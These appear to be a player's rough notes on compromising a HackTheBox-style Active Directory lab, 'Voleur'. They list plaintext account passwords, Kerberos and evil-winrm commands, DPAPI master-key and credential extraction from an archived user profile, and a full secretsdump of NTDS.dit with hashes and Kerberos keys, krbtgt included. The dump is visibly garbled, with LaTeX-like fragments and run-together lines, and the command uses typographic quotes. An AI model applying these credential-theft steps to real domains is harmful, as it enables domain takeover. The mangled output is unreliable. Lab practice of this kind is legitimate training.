Notes

---

start creds ryan.naylor / HollowOct31Nyt

used nxc smb to request TGT

use klist to list kerberos tickets and their info

the smb service is configured to only accept kerberus authentication

when user and pass work you are directly authenticating to smb service with user and pass

use office2john.py to extract hash from document

doc pass Access_Review.xlsx:football1

svc_ldap P/W - M1XyC9pW7qT5Vn

svc_iis P/W - N5pXyW1VqM7CZ8

in remote management group but pass was deleted Todd.Wolfe NightT1meP1dg3on14

winrm-broken-hash ?:AFireInsidedeOzarctica980219afi

this worked for win-rm → this has to b the most ugly command I have ever written

KRB5CCNAME=./svc_winrm.ccache sudo docker run —rm -it -v “/home/ew/box/Voleur/svc_winrm.ccache:/tmp/krb5cc_0” -v “/home/ew/box/Voleur/krb5.conf:/etc/krb5.conf” -v “/etc/hosts:/etc/hosts:ro” evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

folders to check for user data in /AppData directory

get /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88
 
get /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3

*use this tool to crack dpapi key → (data protection API) *

impacket-dpapi

its the key in the /protect folder

then use the tool to crack the user credentials in the /credentials folder

dumped NTDS.dit

secretsdump.py -ntds ntds.dit -system SYSTEM local /usr/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d [] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [] Searching for pekList, be patient [] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40 [] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::voleur.htb\text{ryan}.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::voleur.htb\text{marie}.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::voleur.htb\text{lacey}.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::voleur.htb{\text{svc}}_{l}dap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::voleur.htb{\text{svc}}_{b}ackup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::voleur.htb{\text{svc}}_{i}is:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::voleur.htb\text{jeremy}.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::voleur.htb{\text{svc}}_{w}inrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::[\ast ]Kerberoskeysfromntds.ditAdministrator:aes256-cts-hmac-sha1-96:f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebbAdministrator:aes128-cts-hmac-sha1-96:38af4c8667c90d19b286c7af861b10ccAdministrator:des-cbc-md5:459d836b9edcd6b0DC$:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7 DC$:aes128-cts-hmac-sha1-96:fa76ee3b2757db16b99ffa087f451782DC$:des-cbc-md5:64e05b6d1abff1c8 krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145 krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211 krbtgt:des-cbc-md5:34ae31d073f86d20 voleur.htb\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74 voleur.htb\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1 voleur.htb\ryan.naylor:des-cbc-md5:4376f7917a197a5b voleur.htb\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d voleur.htb\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f voleur.htb\marie.bryant:des-cbc-md5:cdf1492604d3a220 voleur.htb\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9 voleur.htb\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066 voleur.htb\lacey.miller:des-cbc-md5:6eef922076ba7675 voleur.htb\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910 voleur.htb\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f voleur.htb\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776 voleur.htb\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f voleur.htb\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd voleur.htb\svc_backup:des-cbc-md5:7ab513f8ab7f765e voleur.htb\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258 voleur.htb\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395 voleur.htb\svc_iis:des-cbc-md5:70ce25431c577f92 voleur.htb\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0 voleur.htb\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27 voleur.htb\jeremy.combs:des-cbc-md5:192f702abff75257 voleur.htb\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114 voleur.htb\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831 voleur.htb\svc_winrm:des-cbc-md5:32b61fb92a7010ab [] Cleaning up…